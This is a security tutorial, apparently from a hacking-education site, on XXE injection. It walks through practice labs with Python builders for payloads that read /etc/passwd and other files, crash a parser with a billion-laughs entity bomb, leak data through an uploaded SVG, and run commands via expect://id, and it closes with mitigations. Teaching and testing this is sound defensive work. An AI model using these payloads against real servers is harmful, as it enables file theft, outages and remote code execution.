Comprehensive Guide on XXE Injection

XML is a markup language that is commonly used in web development for storing and transporting data. In this article, we will learn how an attacker can abuse XML external entities (XXE) to extract information from a web application and damage its reputation.

XXE Testing Methodology:

  • Introduction to XML
  • Introduction to XXE Injection
  • Impacts
  • XXE For SSRF
    • Local File
    • Remote File
  • XXE Billion Laugh Attack
  • XXE Using File Upload
  • XXE to Remote Code Execution
  • Countermeasures

Introduction to XML

What are XML and Entity?

XML stands for “Extensible Markup Language”. It is one of the most common languages for storing and transporting data. It is a self-descriptive language and does not contain any predefined tags like <p>, <img>, etc. All the tags are user-defined depending upon the data they represent, for example <email></email>, <message></message>, etc. An XML document usually begins with a declaration that can carry the following attributes:

  • Version: It is used to specify what version of XML standard is being used.
    • Values: 1.0
  • Encoding: It is declared to specify the encoding to be used. The default encoding that is used in XML is UTF-8.
    • Values: UTF-8, UTF-16, ISO-10646-UCS-2, ISO-10646-UCS-4, Shift_JIS, ISO-2022-JP, ISO-8859-1 to ISO-8859-9, EUC-JP
  • Standalone: It informs the parser if the document has any link to an external source or there is any reference to an external document. The default value is no.
    • Values: yes, no
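
As a minimal sketch, the three attributes above can be read back from a document with Python's built-in expat bindings. The sample document and its element names are made up for illustration.

```python
import xml.parsers.expat

# Hypothetical sample document; the element names are illustrative only.
DOCUMENT = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    b"<message><email>user@example.com</email></message>"
)


def read_declaration(xml_bytes):
    """Return (version, encoding, standalone) from the XML declaration."""
    seen = {}

    def on_xml_decl(version, encoding, standalone):
        # expat reports standalone as 1 for "yes", 0 for "no",
        # and -1 when the attribute is omitted.
        seen["decl"] = (version, encoding, standalone)

    parser = xml.parsers.expat.ParserCreate()
    parser.XmlDeclHandler = on_xml_decl
    parser.Parse(xml_bytes, True)
    return seen.get("decl")


print(read_declaration(DOCUMENT))
```

If the document has no declaration at all, the handler is never called and the function returns None.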

What is an Entity?

Just as programming languages have variables, XML has entities. They are a way of representing data inside an XML document. There are various built-in entities in XML, like &lt; and &gt;, which stand for the less-than and greater-than signs. These metacharacters are generally written as entities when they appear in data. XML external entities are entities whose value is loaded from outside the DTD in which they are declared.
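
A small sketch of entities in action, using Python's standard xml.etree.ElementTree module. The entity name "greeting" and the element name "message" are invented for this example.

```python
import xml.etree.ElementTree as ET

# Built-in entities: &lt; and &gt; stand in for the metacharacters < and >.
builtin = ET.fromstring("<message>1 &lt; 2 and 3 &gt; 2</message>")
print(builtin.text)

# A custom internal entity declared in the DTD works like a variable:
# it is declared once and expanded wherever it is referenced.
doc = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY greeting "Hello from an entity">
]>
<message>&greeting;</message>"""
custom = ET.fromstring(doc)
print(custom.text)
```

Both values are expanded by the parser before the application ever sees the text, which is exactly what makes entities interesting to an attacker.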

The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

<!ENTITY ignite SYSTEM "URL">

In this syntax, ignite is the name of the entity, SYSTEM is the keyword used, and URL is the resource that we want to fetch by performing an XXE attack.
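
To see how a parser reads such a declaration, here is a hedged sketch that lists the external entities declared in a document without fetching anything. The URL is a placeholder, and the root element name "data" is an assumption for the example.

```python
import xml.parsers.expat

# "http://example.com/resource.txt" is a placeholder, not a real target.
DOCUMENT = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY ignite SYSTEM "http://example.com/resource.txt">
]>
<data>&ignite;</data>"""


def list_external_entities(xml_bytes):
    """Return {entity_name: system_id} for external entities in the DTD."""
    found = {}

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        # External entities carry no inline value; the system identifier
        # holds the URL the value would be loaded from.
        if system_id is not None:
            found[name] = system_id

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return found


print(list_external_entities(DOCUMENT))
```

No request is made here because no external entity handler is installed; the sketch only reports what the DTD declares.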

What is the Document Type Definition (DTD)?

A DTD declares the structure of an XML document, the types of data values it can contain, and so on. A DTD can be present inside the XML file or can be defined separately. It is declared at the beginning of the XML document using <!DOCTYPE>.

There are several types of DTDs, and the one we are interested in is the external DTD. An external DTD can be referenced in two ways:

SYSTEM: The system identifier enables us to specify the location of the external file that contains the DTD declarations.

PUBLIC: A public identifier provides a mechanism to locate DTD resources. It begins with the keyword PUBLIC, followed by a specialized identifier, and is used to identify an entry in a catalog.
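
The two forms can be compared with a short sketch that reads the DOCTYPE of a document. The file name "note.dtd" is hypothetical; the PUBLIC example uses the well-known XHTML 1.0 Strict identifier.

```python
import xml.parsers.expat


def read_doctype(xml_bytes):
    """Return (name, system_id, public_id) from the DOCTYPE declaration."""
    seen = {}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        seen["doctype"] = (name, system_id, public_id)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)
    return seen.get("doctype")


# SYSTEM: the DTD is located by a file path or URL ("note.dtd" is made up).
system_doc = b'<!DOCTYPE note SYSTEM "note.dtd"><note/>'

# PUBLIC: a public identifier, followed by a system identifier as fallback.
public_doc = (
    b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
    b'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html/>'
)

print(read_doctype(system_doc))
print(read_doctype(public_doc))
```

The parser in this sketch only reports the identifiers; it does not download the external DTD.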

Introduction to XXE

XXE is a type of attack performed against an application that parses XML input. In this attack, XML input containing a reference to an external entity is processed by a weakly configured XML parser. Just as in Cross-Site Scripting (XSS) we try to inject scripts, here we try to insert XML entities to gain crucial information.

In this attack, the XML external entity payload is sent to the server, and the server passes that data to an XML parser, which parses the XML request and returns the resolved output to the server. The server then returns that output to the attacker.
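
Whether this flow succeeds depends entirely on how the parser is configured. As a point of contrast, the sketch below feeds an XXE document to Python's standard xml.etree.ElementTree, which does not resolve external entities and rejects the reference with a ParseError. The element names are assumptions for the example.

```python
import xml.etree.ElementTree as ET

XXE_DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE reset [
  <!ENTITY ignite SYSTEM "file:///etc/passwd">
]>
<reset><login>&ignite;</login></reset>"""


def try_parse(xml_text):
    """Return the <login> text, or None if the parser rejects the document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # ElementTree refuses to expand the external entity reference.
        return None
    return root.findtext("login")


print(try_parse("<reset><login>bee</login></reset>"))
print(try_parse(XXE_DOCUMENT))
```

A parser that does resolve the entity would instead place the file contents in the login field, which is the behaviour the rest of this article exploits.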


Impacts

XML External Entity (XXE) can pose a severe threat to a company or a web developer. XXE had its own entry (A4) in the OWASP Top 10 list of 2017. It is common because lots of websites use XML for the storage and transportation of data, and if countermeasures are not taken, this information will be compromised. Various attacks that are possible are:

  • Server-Side Request Forgery
  • DoS Attack
  • Remote Code Execution
  • Cross-Site Scripting

The CVSS score commonly given for XXE is 7.5, which corresponds to High severity, with:

  • CWE-611: Improper Restriction of XML External Entity Reference.
  • CVE-2019-12153: Local File SSRF
  • CVE-2019-12154: Remote File SSRF
  • CVE-2018-1000838: Billion Laugh Attack
  • CVE-2019-0340: XXE via File Upload

Performing XXE Attack to perform SSRF:

Server-Side Request Forgery (SSRF) is a web vulnerability where the attacker makes the server send requests to a location of the attacker’s choosing, in order to read resources that the server can reach or to redirect the output to the attacker’s server. File types for SSRF attacks are:

Local File:

These are files that are present on the website’s own domain, such as robots.txt, server-info, etc. So, let’s use “bWAPP” to perform an XXE attack with the security level set to low.

Now we will fire up Burp Suite, press the Any Bugs? button, and intercept the resulting request.

We can see that no filter is applied, so XXE is possible. We will send the request to the repeater and perform our attack there. First, we need to find out which field is vulnerable or injectable, because there are two fields: login and secret.

So, we will test it as follows:

In the repeater tab, we will send the default request and observe the output in the response tab.

It says “bee’s secret has been reset”, so it seems that login is injectable. Let’s verify this by changing the value from bee to ignite and sending the request again.

Now we will again observe the output in the response tab.

We got the output “ignite’s secret has been reset”, which makes it clear that login is injectable. Now we will perform our attack.

Now that we know which field is injectable, let’s try to get the robots.txt file. For this, we’ll use a payload that declares an external entity pointing to robots.txt and references it in the login field.

Understanding the payload

We have declared a doctype with the name “reset” and then inside that declared an entity named “ignite”. We are using SYSTEM identifier and then entering the URL to robots.txt. Then in login, we are entering “&ignite;” to get the desired information.
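
The payload described above can be sketched as follows. The host name TARGET, the bWAPP path, and the value of the secret field are assumptions; substitute the address of your own lab.

```python
def build_reset_payload(resource_url):
    """Build an XML body that places an external entity in <login>."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE reset [\n"
        f'<!ENTITY ignite SYSTEM "{resource_url}">\n'
        "]>\n"
        "<reset><login>&ignite;</login><secret>Any bugs?</secret></reset>"
    )


# Placeholder URL: TARGET stands for the address of your own bWAPP lab.
payload = build_reset_payload("http://TARGET/bWAPP/robots.txt")
print(payload)
```

The doctype name matches the root element of the request, and the only change to the body itself is that the login value becomes the entity reference.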

After inserting the above payload, we will click on send and observe the response tab.

The response contains all the details that are present in robots.txt. This tells us that SSRF of a local file is possible using XXE.

So now, let’s understand how it all worked. We inject the payload, and it is passed on to the server. As there are no filters in place to prevent XXE, the server hands the request to an XML parser, the parser resolves the entity, and the server returns the parsed output. In this case, robots.txt was disclosed to the attacker through an XML request.

Remote File:

In this case the attacker makes the entity point to a resource of their own choosing, such as a remotely hosted malicious script or a sensitive file, in order to gain admin access or crucial information. We will try to read /etc/passwd by pointing the entity at that file.

As soon as we hit the send button with this payload, the contents of the passwd file are reflected in the response!
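
A hedged sketch of this payload, together with a harmless way to see which resource a resolving parser would be asked to load. The handler below only records the request and never opens the file; the request body layout is assumed to be the same as in the previous test.

```python
import xml.parsers.expat

PAYLOAD = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset [
<!ENTITY ignite SYSTEM "file:///etc/passwd">
]>
<reset><login>&ignite;</login><secret>Any bugs?</secret></reset>"""


def requested_resources(xml_bytes):
    """List the system identifiers a resolving parser would try to load."""
    requested = []

    def on_external_ref(context, base, system_id, public_id):
        # Record the request instead of fetching it; returning 1 tells
        # expat to carry on parsing.
        requested.append(system_id)
        return 1

    parser = xml.parsers.expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return requested


print(requested_resources(PAYLOAD))
```

A vulnerable server does the step this sketch skips: it reads the resource and substitutes its contents for &ignite;.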

XXE Billion Laugh Attack-DOS

This attack is aimed at XML parsers: XML data that is both well-formed and valid exhausts system resources while it is being parsed. It is also known as an XML bomb, XML DoS, or exponential entity expansion attack.

Before performing the attack, let’s see why it is known as the Billion Laugh Attack.

“For the first time when this attack was done, the attacker used lol as the entity data and then called it multiple times in several following entities. It took an exponential amount of time to execute and its result was a successful DoS attack bringing the website down. Due to the usage of lol and calling it multiple times, which resulted in billions of requests, we got the name Billion Laugh Attack.”

Before using the payload, let’s understand it:

In the payload, at 1 we declare an entity named “ignite” and then reference ignite in several other entities, forming a chain of nested references that will overload the server. At 2 we reference the entity &ignite9;. We use ignite9 instead of ignite because ignite9 references ignite8 several times, each ignite8 references ignite7 several times, and so on. Thus, the amount of data the parser has to expand grows exponentially, and as a result, the website will go down.
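
The growth described above can be made concrete with a small generator. This is a sketch under assumptions: ten references per level, the word "lol" as the base value, and the same request body as in the earlier tests. The code only builds the text and computes its expanded size; it never parses the payload.

```python
def build_billion_laughs(levels=9, fanout=10, word="lol"):
    """Build a nested-entity payload and report its expanded size.

    Entity "ignite" holds `word`; each "igniteN" references the previous
    entity `fanout` times, so the last one expands to fanout**levels copies.
    """
    lines = ['<?xml version="1.0" encoding="utf-8"?>', "<!DOCTYPE reset ["]
    lines.append(f'<!ENTITY ignite "{word}">')
    previous = "ignite"
    for level in range(1, levels + 1):
        name = f"ignite{level}"
        refs = f"&{previous};" * fanout
        lines.append(f'<!ENTITY {name} "{refs}">')
        previous = name
    lines.append("]>")
    lines.append(
        f"<reset><login>&{previous};</login><secret>Any bugs?</secret></reset>"
    )
    payload = "\n".join(lines)
    expanded_chars = len(word) * fanout ** levels
    return payload, expanded_chars


payload, expanded_chars = build_billion_laughs()
print(len(payload), "characters sent;", expanded_chars, "characters after expansion")
```

With nine levels of ten references each, a request of roughly a thousand characters asks the parser to produce ten to the power of nine copies of the word, which is where the "billion" in the name comes from.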

The above payload results in a DoS attack.

After sending it, we will not see any output in the response field, and bee-box is no longer accessible because it is down.

XXE Using File Upload

XXE can be performed using the file upload method. We will demonstrate this using the PortSwigger lab “Exploiting XXE via Image Upload”. The payload is an SVG image that declares an external entity.

Understanding the payload: We create an SVG file because only image files are accepted by the upload area. To the basic syntax of an SVG file we add a text field that will hold the entity reference, so its value is rendered as text in the image.

We will save the payload as “payload.svg”. Now on PortSwigger, we will open a post, write a comment, and add the payload file in the avatar field.
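
A sketch of how such a file could be generated. The entity name, the image dimensions, and the target path /etc/hostname (the file that the PortSwigger lab asks for) are assumptions made for this example.

```python
from pathlib import Path

# The <text> element carries the entity reference, so a vulnerable image
# processor renders the file contents into the picture.
SVG_PAYLOAD = """<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY ignite SYSTEM "file:///etc/hostname">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text font-size="16" x="0" y="16">&ignite;</text>
</svg>
"""


def write_payload(path="payload.svg"):
    """Write the SVG payload to disk and return the path that was written."""
    target = Path(path)
    target.write_text(SVG_PAYLOAD, encoding="utf-8")
    return target


print(SVG_PAYLOAD)
```

Calling write_payload() creates payload.svg in the current directory, ready to be selected in the avatar field.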

Now we will post the comment by pressing the Post Comment button. After this, we will visit the post on which we commented, and we will see our comment in the comments section.

Let’s check the page source in order to find the comment that we posted. You will find a link to the uploaded avatar image.

We will click on that link and get the flag in a new window.

This can be verified by submitting the flag, after which we will get the success message.

Understanding the whole concept: When we uploaded the payload in the avatar field and filled in all the other fields, our comment was shown in the post. Upon examining the page source, we found the path where our file was uploaded. We are interested in that path because our XXE payload was inside that SVG file, so the processed image contains the information that we wanted, in this case the contents of “/etc/hostname”. After opening that link, we were able to see the information.

XXE to Remote Code Execution

Remote code execution is a very severe web application vulnerability. Here an attacker is able to run malicious code on the server in order to gain crucial information. To demonstrate this attack I have used XXE LAB, which we will download and run on our Linux machine.

Once the terminal shows that the lab is up and ready to use, we will open it in the browser.

We will enter our details and intercept the request using Burp Suite.

We will send this request to the repeater to find out which field is vulnerable. First, we will send the request as it is and observe the response tab.

We notice that only the email is reflected in the response, so we will send one more request with a different email value to verify that this field is the vulnerable one.

The response makes it clear that the email field is vulnerable. Now we will enter our payload.

Let’s understand the payload before using it:

We have created a doctype with the name “root”, and under it we created an entity named “ignite” that requests “expect://id”. If the expect:// wrapper is accepted by the PHP page, then remote code execution is possible. We want to run the id command, so we used “id” in this case.
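
The payload described above can be sketched as follows. The field names in the request body (name, tel, email, password) and their dummy values are assumptions about the lab's form; only the doctype name, the entity name, and the expect://id identifier come from the description.

```python
def build_expect_payload(command="id"):
    """Build a request body whose <email> field references expect://<command>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        f'<!ENTITY ignite SYSTEM "expect://{command}">\n'
        "]>\n"
        "<root>"
        "<name>test</name>"          # assumed field, dummy value
        "<tel>0000000000</tel>"      # assumed field, dummy value
        "<email>&ignite;</email>"    # the reflected, vulnerable field
        "<password>test</password>"  # assumed field, dummy value
        "</root>"
    )


payload = build_expect_payload()
print(payload)
```

The entity sits in the email field because that is the value the application echoes back in its response.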

And we can see that we got the uid, gid, and groups successfully. This proves that our remote code execution was successful in this case.


Mitigation Steps

  • The safest way to prevent XXE is always to disable DTDs (and with them external entities) completely. Depending on the parser, this is done through a parser-specific feature or setting.
  • DoS attacks such as the Billion Laugh Attack are also prevented by disabling DTDs. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that’s specific to each parser.
  • Another method is using CDATA so that untrusted data is not parsed. CDATA is character data: a block that the parser does not interpret as markup, so entity references inside it are not expanded.
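
As one possible illustration of the first point, the sketch below rejects any document that contains a DOCTYPE before its content is processed. It uses Python's built-in expat bindings; the exception class and function name are made up for this example, and other parsers expose their own switches for the same purpose.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_without_dtd(xml_bytes):
    """Collect element text while rejecting any document that has a DTD."""
    texts = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Without a DOCTYPE there are no entity declarations, so neither
        # external entities nor nested-entity bombs can be defined.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = texts.append
    parser.Parse(xml_bytes, True)
    return "".join(texts)


print(parse_without_dtd(b"<reset><login>bee</login></reset>"))
```

A request carrying any of the payloads from this article raises DoctypeForbidden instead of being parsed. The third-party defusedxml package follows the same idea with its forbid_dtd option.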

Author: Naman Kumar is a cyber security enthusiast who is trying to gain some knowledge in the cyber security field.

Source: Hacking Articles
